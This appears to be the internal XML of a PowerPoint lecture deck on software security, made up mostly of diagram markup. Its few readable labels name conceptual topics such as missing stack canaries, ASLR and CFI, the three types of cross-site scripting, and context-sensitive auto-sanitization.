    <dgm:pt modelId="{FFA2CB28-0526-4796-9B4A-8958D8DD79AE}" type="sibTrans" cxnId="{78E9228D-41FF-479F-B7BC-1B975FD95399}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A310B8C5-9140-4F94-B6FA-C39F4F7F98A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>No stack canaries</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FC5528F-DE60-44E6-A456-72F21F620D95}" type="parTrans" cxnId="{FB8583DC-E37A-491A-9272-82860814563D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5741B81C-B775-4EB9-9AE4-4D8795DA7C8B}" type="sibTrans" cxnId="{FB8583DC-E37A-491A-9272-82860814563D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D3AF650-6DA9-43EC-811A-1D0EC349DAE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>No control flow integrity (CFI) checks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA6AAB1C-8401-477D-9CE1-59B599412AFD}" type="parTrans" cxnId="{7C4F682C-E0E3-4254-9A78-464587C910DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A03BF46-F7F2-480F-844D-DB81CB99DA86}" type="sibTrans" cxnId="{7C4F682C-E0E3-4254-9A78-464587C910DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="1"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Operating system is not hardened</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABD7614F-C975-4E0A-A0CB-3DEC20CB1300}" type="parTrans" cxnId="{E9BAC92B-69F8-43BD-9EC1-33B96F875E13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C31D926C-6F3F-4AC1-9328-85E712BF700A}" type="sibTrans" cxnId="{E9BAC92B-69F8-43BD-9EC1-33B96F875E13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD66CBEC-B332-44F6-9F37-111427B47A79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>No memory randomization (ASLR)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{527BBC41-47BC-4113-8AB4-985A069F8624}" type="parTrans" cxnId="{C0D2533D-39A6-437E-B520-DF6336E4BF70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEBFAEA5-423A-4633-B8F1-5B4A9A7B4104}" type="sibTrans" cxnId="{C0D2533D-39A6-437E-B520-DF6336E4BF70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C95F3819-A82D-43FD-B831-2B70F1CBCD53}" type="pres">
      <dgm:prSet presAssocID="{FB306FC0-B84E-471B-A4DE-E0F4D1DE5515}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" type="pres">
      <dgm:prSet presAssocID="{886FBC66-753A-4938-A9BD-9BFE186FC996}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3915EC6-E336-4BFA-8F6E-EE4B2EB98504}" type="pres">
      <dgm:prSet presAssocID="{886FBC66-753A-4938-A9BD-9BFE186FC99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A9C513B4-C052-4271-8F1E-DE3A4E96AE18}" type="pres">
      <dgm:prSet presAssocID="{886FBC66-753A-4938-A9BD-9BFE186FC996}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3A7CD826-2C54-4E2A-8E07-B35914DEAAF6}" type="pres">
      <dgm:prSet presAssocID="{886FBC66-753A-4938-A9BD-9BFE186FC996}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D9E66B7-1CB6-4295-ACEE-FB13F481DF8F}" type="pres">
      <dgm:prSet presAssocID="{886FBC66-753A-4938-A9BD-9BFE186FC996}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13F2626D-B755-4986-9C32-B2A01D888D18}" type="pres">
      <dgm:prSet presAssocID="{886FBC66-753A-4938-A9BD-9BFE186FC996}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98A36070-9A06-48E4-A9A6-342420A8ECE4}" type="pres">
      <dgm:prSet presAssocID="{FFA2CB28-0526-4796-9B4A-8958D8DD79AE}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{780CE428-34FC-47AA-BFFE-5557C2327108}" type="pres">
      <dgm:prSet presAssocID="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ECD8F4BA-626E-4F7F-ADAC-EE29CE386083}" type="pres">
      <dgm:prSet presAssocID="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D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dioactive Sign"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{73859F1D-18F8-4299-82C5-B566A75C1798}" type="pres">
      <dgm:prSet presAssocID="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{817D5A4F-611B-4767-8231-7A7763474899}" type="pres">
      <dgm:prSet presAssocID="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{803616B9-90EF-460C-9486-69277001F90D}" type="pres">
      <dgm:prSet presAssocID="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{466299BC-1A40-4528-8D06-A0B8977D66E7}" type="pres">
      <dgm:prSet presAssocID="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E9BAC92B-69F8-43BD-9EC1-33B96F875E13}" srcId="{FB306FC0-B84E-471B-A4DE-E0F4D1DE5515}" destId="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" srcOrd="1" destOrd="0" parTransId="{ABD7614F-C975-4E0A-A0CB-3DEC20CB1300}" sibTransId="{C31D926C-6F3F-4AC1-9328-85E712BF700A}"/>
    <dgm:cxn modelId="{7C4F682C-E0E3-4254-9A78-464587C910DE}" srcId="{886FBC66-753A-4938-A9BD-9BFE186FC996}" destId="{0D3AF650-6DA9-43EC-811A-1D0EC349DAE0}" srcOrd="1" destOrd="0" parTransId="{BA6AAB1C-8401-477D-9CE1-59B599412AFD}" sibTransId="{0A03BF46-F7F2-480F-844D-DB81CB99DA86}"/>
    <dgm:cxn modelId="{C0D2533D-39A6-437E-B520-DF6336E4BF70}" srcId="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" destId="{FD66CBEC-B332-44F6-9F37-111427B47A79}" srcOrd="0" destOrd="0" parTransId="{527BBC41-47BC-4113-8AB4-985A069F8624}" sibTransId="{DEBFAEA5-423A-4633-B8F1-5B4A9A7B4104}"/>
    <dgm:cxn modelId="{2D2E0276-39D4-444E-8035-1A861A8933F1}" type="presOf" srcId="{886FBC66-753A-4938-A9BD-9BFE186FC996}" destId="{3A7CD826-2C54-4E2A-8E07-B35914DEAAF6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{E18C187C-A316-41C3-A0F3-7EFDF5A9927A}" type="presOf" srcId="{FB306FC0-B84E-471B-A4DE-E0F4D1DE5515}" destId="{C95F3819-A82D-43FD-B831-2B70F1CBCD53}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{688AF27F-02CF-4523-83A7-26C26C36AB61}" type="presOf" srcId="{0D3AF650-6DA9-43EC-811A-1D0EC349DAE0}" destId="{13F2626D-B755-4986-9C32-B2A01D888D18}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{2C021184-BE12-432F-A817-59AF5C5C3F40}" type="presOf" srcId="{FD66CBEC-B332-44F6-9F37-111427B47A79}" destId="{466299BC-1A40-4528-8D06-A0B8977D66E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{78E9228D-41FF-479F-B7BC-1B975FD95399}" srcId="{FB306FC0-B84E-471B-A4DE-E0F4D1DE5515}" destId="{886FBC66-753A-4938-A9BD-9BFE186FC996}" srcOrd="0" destOrd="0" parTransId="{A9010073-0584-44D1-8EA5-E48B049F032D}" sibTransId="{FFA2CB28-0526-4796-9B4A-8958D8DD79AE}"/>
    <dgm:cxn modelId="{FFEB928E-A6D3-4513-990E-E9554B0EA420}" type="presOf" srcId="{A310B8C5-9140-4F94-B6FA-C39F4F7F98A7}" destId="{13F2626D-B755-4986-9C32-B2A01D888D18}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{FB8583DC-E37A-491A-9272-82860814563D}" srcId="{886FBC66-753A-4938-A9BD-9BFE186FC996}" destId="{A310B8C5-9140-4F94-B6FA-C39F4F7F98A7}" srcOrd="0" destOrd="0" parTransId="{6FC5528F-DE60-44E6-A456-72F21F620D95}" sibTransId="{5741B81C-B775-4EB9-9AE4-4D8795DA7C8B}"/>
    <dgm:cxn modelId="{967AAEE5-B85B-4A36-8788-9E9354025F5A}" type="presOf" srcId="{F948CEA2-BF1E-43B6-A3B0-E00FC339ED1D}" destId="{817D5A4F-611B-4767-8231-7A7763474899}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{08027795-57BC-4B55-BC1E-E57BA2D1402D}" type="presParOf" srcId="{C95F3819-A82D-43FD-B831-2B70F1CBCD53}" destId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{0E1C5289-7D62-4386-8DB5-BDF89761A002}" type="presParOf" srcId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" destId="{C3915EC6-E336-4BFA-8F6E-EE4B2EB98504}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{EEB93CBE-EE06-4D93-B009-FCFEE5689F46}" type="presParOf" srcId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" destId="{A9C513B4-C052-4271-8F1E-DE3A4E96AE18}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{861E22A0-0B51-4834-BDC2-EB4C7DD7D691}" type="presParOf" srcId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" destId="{3A7CD826-2C54-4E2A-8E07-B35914DEAAF6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{57DE5BF5-A1B9-4041-9810-9DBF8298BF81}" type="presParOf" srcId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" destId="{6D9E66B7-1CB6-4295-ACEE-FB13F481DF8F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{57430F2F-6077-4332-AC62-6AC6585F7F7A}" type="presParOf" srcId="{724D879A-65C6-4CC6-B78F-7D0655985D36}" destId="{13F2626D-B755-4986-9C32-B2A01D888D18}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{16142C1E-C80A-46C9-B65D-BC801DAA08D1}" type="presParOf" srcId="{C95F3819-A82D-43FD-B831-2B70F1CBCD53}" destId="{98A36070-9A06-48E4-A9A6-342420A8ECE4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{D46DC6A7-FA2F-4FEE-817E-37D8A08F0A5D}" type="presParOf" srcId="{C95F3819-A82D-43FD-B831-2B70F1CBCD53}" destId="{780CE428-34FC-47AA-BFFE-5557C2327108}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{26373B3A-92BB-43B6-B1CE-615C2ACAC198}" type="presParOf" srcId="{780CE428-34FC-47AA-BFFE-5557C2327108}" destId="{ECD8F4BA-626E-4F7F-ADAC-EE29CE386083}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{76932B43-F5A0-4CE7-9FA4-EFE17E407468}" type="presParOf" srcId="{780CE428-34FC-47AA-BFFE-5557C2327108}" destId="{73859F1D-18F8-4299-82C5-B566A75C1798}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{7F663987-BB3C-4A3A-882A-A971718653BD}" type="presParOf" srcId="{780CE428-34FC-47AA-BFFE-5557C2327108}" destId="{817D5A4F-611B-4767-8231-7A7763474899}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{59FC5DB3-A2B6-4AEB-B7B3-3A693FC18FC4}" type="presParOf" srcId="{780CE428-34FC-47AA-BFFE-5557C2327108}" destId="{803616B9-90EF-460C-9486-69277001F90D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelDescriptionList"/>
    <dgm:cxn modelId="{FB6A4487-0B36-408E-956C-5000CAD7DC7A}" type="presParOf" srcId="{780CE428-34FC-47AA-BFFE-5557C2327108}" destId="{466299BC-1A40-4528-8D06-A0B8977D66E7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B9ACE7-2AFC-495C-809D-A6B736A735A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3286" y="78072"/>
          <a:ext cx="3203971" cy="691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Reflected (Type 1)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3286" y="78072"/>
        <a:ext cx="3203971" cy="691200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EF19BD63-E329-4576-9266-5EFCDAFDAA7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3286" y="769272"/>
          <a:ext cx="3203971" cy="350399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Code is included as part of a malicious link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Code included in page rendered by visiting link</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3286" y="769272"/>
        <a:ext cx="3203971" cy="3503992"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB9A6962-60CA-453B-94B8-1C4188597BDD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3655814" y="78072"/>
          <a:ext cx="3203971" cy="691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Stored (Type 2)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3655814" y="78072"/>
        <a:ext cx="3203971" cy="691200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3D1B395E-FAEA-48FE-B8EB-7CE7174C2198}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3655814" y="769272"/>
          <a:ext cx="3203971" cy="350399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Attacker submits malicious code to server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Server app persists malicious code to storage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Victim accesses page that includes stored code</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3655814" y="769272"/>
        <a:ext cx="3203971" cy="3503992"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A77957A1-B775-4737-9927-F68EE564A33F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7308342" y="78072"/>
          <a:ext cx="3203971" cy="691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DOM-based (Type 3)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7308342" y="78072"/>
        <a:ext cx="3203971" cy="691200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1360B2EC-EFB3-453E-9353-5DEB5BE5A143}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7308342" y="769272"/>
          <a:ext cx="3203971" cy="350399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Purely client-side injection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7308342" y="769272"/>
        <a:ext cx="3203971" cy="35039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915EC6-E336-4BFA-8F6E-EE4B2EB98504}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1005743" y="718565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7CD826-2C54-4E2A-8E07-B35914DEAAF6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1005743" y="2355876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kern="1200"/>
            <a:t>Compiler is not hardened</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1005743" y="2355876"/>
        <a:ext cx="4320000" cy="648000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13F2626D-B755-4986-9C32-B2A01D888D18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1005743" y="3062160"/>
          <a:ext cx="4320000" cy="570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No stack canaries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No control flow integrity (CFI) checks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1005743" y="3062160"/>
        <a:ext cx="4320000" cy="570611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ECD8F4BA-626E-4F7F-ADAC-EE29CE386083}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6081743" y="718565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7D5A4F-611B-4767-8231-7A7763474899}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6081743" y="2355876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kern="1200"/>
            <a:t>Operating system is not hardened</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6081743" y="2355876"/>
        <a:ext cx="4320000" cy="648000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{466299BC-1A40-4528-8D06-A0B8977D66E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6081743" y="3062160"/>
          <a:ext cx="4320000" cy="570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No memory randomization (ASLR)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6081743" y="3062160"/>
        <a:ext cx="4320000" cy="5706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8042AE-A999-48C8-9C41-0EB84E665592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743B9-CA01-443A-AB34-196053FB7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288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69" name="Shape 46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Auto-sanitization requires context-sensitivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3776786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44183-7561-4EC9-81D4-1D28E38AAD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B10340-E29D-477F-85BE-ADE380686D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C76B81-3935-4EEB-A508-65D44CB9F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016BB-603F-4E45-BB71-7B2EA0E63EC5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A9F718-9D58-44B0-9AF4-EEC17D92E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CB966-F59F-4399-97A1-D4AA94F4F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9D2F-E88C-4723-B280-B694997C3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686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C3FC2-61C9-434B-99EF-77F82BABD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97E03E-9F8B-4311-B4DF-D7DC9722AF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9C325-E8DE-4B83-888E-23F08436D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016BB-603F-4E45-BB71-7B2EA0E63EC5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532A71-FD06-429A-81A4-2964A4EAF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E62EA5-085E-4E47-AA71-0C7C3FD38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9D2F-E88C-4723-B280-B694997C3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787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CBAF28-F3C4-4CFC-A7B1-64E391DA1F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6A21F8-5C83-422C-938C-A876CE198B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8C729-CDBA-4757-94D5-92EBF12CD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016BB-603F-4E45-BB71-7B2EA0E63EC5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FD07B3-620F-44DB-BB6E-F2748B49D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717CB-363C-4DD0-A30C-DE47B3D26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9D2F-E88C-4723-B280-B694997C3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685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625056" indent="-312528"/>
            <a:lvl3pPr marL="937584" indent="-312528"/>
            <a:lvl4pPr marL="1250112" indent="-312528"/>
            <a:lvl5pPr marL="1562640" indent="-312528"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/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205364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1A14D-DD1C-4951-9DD2-8A4781701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6FC23-E4E3-42C5-AEFF-F4F0867A6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348676-A43B-41E2-B239-EBEF77531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016BB-603F-4E45-BB71-7B2EA0E63EC5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3A9D3-AB52-46E0-B259-F20B4731C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519990-E026-4CA5-9CB2-22277BE16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9D2F-E88C-4723-B280-B694997C3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2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573B5-495E-4196-9FE3-DE748FD31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94B9FD-D260-4C96-BA0D-26C8E9CE2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264AE4-FF36-41F4-B417-5CAE19FC9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016BB-603F-4E45-BB71-7B2EA0E63EC5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7595B5-D7DA-4726-841B-B3E0A7A5E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22823-D5DA-4B84-A1F1-EE651CF20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9D2F-E88C-4723-B280-B694997C3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918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81102-8603-4125-A1E5-8762024D0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9E8B0-6AB0-4638-B5DD-2E764A8165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2CFC08-1994-4879-A7D7-0173BFEA95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D661D0-CDCA-46FE-A176-55948FBCA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016BB-603F-4E45-BB71-7B2EA0E63EC5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5C84FF-55FD-47B7-B913-2DEFEDB1E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5E2FB6-F8C9-42C9-8812-62147AEF7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9D2F-E88C-4723-B280-B694997C3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999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7C001-CDB5-4E7D-8892-FA6820EAD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72AC75-FB88-40EC-8A1B-2D151FD7BB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11DC53-3DC0-46AE-9D95-F421098207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4BD170-C6F4-4236-8BA2-B4D52FC87F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20C008-12EB-4405-A2A0-66DD3FF258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21B306-FE18-4193-8A5F-C251450D7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016BB-603F-4E45-BB71-7B2EA0E63EC5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85924E-91AC-4BAF-8EC0-95A635C4F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BE94BA-0DD4-4BD0-9E7E-FB9D3D77A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9D2F-E88C-4723-B280-B694997C3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708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6CFA8-F335-4C5E-8BF6-3FAE6EF6F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9B28FE-36F7-49B2-9D2D-DE83A2529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016BB-603F-4E45-BB71-7B2EA0E63EC5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5BEAEA-5E8E-4276-9C7D-D10371377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D1DE4D-3A48-40B6-BAFD-3B4FB27C8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9D2F-E88C-4723-B280-B694997C3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990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8A0F51-95A5-4FCC-82A0-2139FD138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016BB-603F-4E45-BB71-7B2EA0E63EC5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6AD572-A4E5-4A12-9F20-194D39D77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E346D9-0163-4200-A4EE-11B98DB0E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9D2F-E88C-4723-B280-B694997C3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304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83CFA-4715-47A7-973F-EFB58A31B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42C8D-E0CC-46C1-ACAD-A0395A5E5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A0E468-3718-443E-94CA-CA298A5E9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091E15-5481-4DB8-8EFB-2BFE04558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016BB-603F-4E45-BB71-7B2EA0E63EC5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554D76-C060-45CB-B4CE-B4750622B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F409D0-8B5D-40AD-B3E7-3575DD480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9D2F-E88C-4723-B280-B694997C3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512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D4F1C-AFD2-4854-8BAF-D66B0FE06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90EEA3-03B2-49E6-AFC7-ABE6ADBD3D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31EF05-A83A-4390-9CA8-38FB8F025C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381983-662E-43EF-919D-E2F886A7D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016BB-603F-4E45-BB71-7B2EA0E63EC5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262B47-2305-4167-A2B4-A1E9F9E29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FF1D3F-1EFB-4BE3-B7B4-4068951D1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9D2F-E88C-4723-B280-B694997C3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56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95138A-9205-480F-918D-8830B5B31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D910A8-2268-432C-A7E3-169770BB6D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CF253F-9C7E-4AF9-87C1-27A2C3D66C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016BB-603F-4E45-BB71-7B2EA0E63EC5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51941E-7DAD-42EE-9F71-2294DF2600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829B3-E83D-40A2-99A0-3C2582DDB6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29D2F-E88C-4723-B280-B694997C3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679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search.com/search?q=Christo+Wilson" TargetMode="External"/><Relationship Id="rId2" 